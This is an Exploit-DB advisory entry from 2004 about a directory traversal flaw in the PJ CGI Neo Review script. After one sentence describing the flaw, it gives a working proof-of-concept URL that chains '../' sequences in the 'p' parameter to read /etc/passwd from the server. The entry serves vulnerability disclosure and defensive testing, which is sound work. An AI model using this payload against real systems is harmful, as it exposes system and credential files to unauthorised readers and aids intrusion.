PJ CGI Neo Review - Directory Traversal

EDB-ID:

23615




Platform:

CGI

Date:

2004-01-29


source: https://www.securityfocus.com/bid/9524/info

It has been reported that PJ CGI Neo Review may be prone to a directory traversal vulnerability that may allow a remote attacker to access information outside the server root directory by using '../' character sequences.

http://www.example.com/directory/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../../etc/passwd